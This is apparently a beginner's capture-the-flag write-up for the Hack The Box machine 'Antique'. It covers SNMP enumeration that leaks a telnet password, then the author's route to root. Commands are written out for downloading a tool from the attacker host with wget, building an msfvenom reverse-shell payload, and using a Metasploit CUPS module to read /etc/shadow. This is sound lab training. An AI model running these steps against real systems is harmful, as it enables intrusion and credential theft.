Antique
This is my write-up for the machine Antique located at: https://app.hackthebox.com/machines/Antique.
I am a beginner at penetration testing, so I will be referencing the Official Hack The Box Walk-through for this machine.
From the tags, I am able to notice that this machine is about printer exploitation on Linux:
A basic nmap scan shows that only telnet is online:
Trying to telnet into the system, it asks for a password:
I also had a deeper nmap scan running: nmap -A -T4 -p- 10.10.11.107 -oN antique.nmap
This nmap scan came back with pretty much the same information. I then viewed the walk-through to see where I had messed up. I learned about a tool called snmpwalk. In the walk-through, the author runs snmpwalk -v 2c -c public 10.10.11.107
, which gets the following output:
I had actually had found the password for telnet on my own, but I was unable to decode it:
I use snmpget, while the walk-through used snmpwalk. In the walk-through they used binascii (python import) in order to decode the bytes. I wanted to find a solution that was a bit more basic. I ended up using https://www.rapidtables.com/convert/number/ascii-hex-bin-dec-converter.html to convert the bytes from hex to ascii:
The password seems to be: P@ssw0rd@123!!123 I was in!
I then noticed the walk-through mentioned to run exec id
. I then tried playing around with linux commands, and ended up finding the user.txt file:
I noticed the write-up use python for the reverse shell. I then used https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#python to see if I can use one of their python commands. Once I changed their python command from python to python3, it worked:
I viewed the walk-through again to see what I missed. The walk-through author runs the netstat command to see what connections are there:
They then go on to say that we should use chisel to connect to the port. I ran into an issue here where I was unable to download a GitHub repository onto the machine itself. I then realize that you make the binary locally and then upload it to the server. I uploaded the file to the machine by running python3 -m http.server
on the folder where chisel was downloaded. I was then able to upload it by running wget http://10.10.14.10:8000/chisel
on the remote machine. When I uploaded the file, I was unable to run it due to some dependency error in terms of version of libc:
I then followed this write-up to see what I missed and what I could have done instead. They run wget localhost:631
, which makes a file called index.html in the folder you are in. There, you can see that CUPS is mentioned:
When we search for cups on metasploit we get the following:
We first make a shell file to upload to the server. To do this, the walk-through mentioned previously mentions msfvenom -p linux/x64/meterpreter/reverse
tcp LHOST=<
YOUR-IP> LPORT=1337 --format elf > shell
. This will make the shell file in your directory. To move it to the remote machine, you can use the python http.server command mentioned previously. Before I ran the shell executable, I ran the following commands in Metasploit (based off of this write-up):
After I ran the run command, I then switched to the remote machine and ran the shell executable (run chmod +x shell
to make it executable). This gave me a connection in Metasploit:
I then ran the following commands to look for the cups post exploitation program:
I then hit run and got an output:
Opening that file shows the output of /etc/shadow:
Since we want to get the output of /root/root.txt, I changed my option in metasploit to that:
Reading that file got me the root flag:
Last updated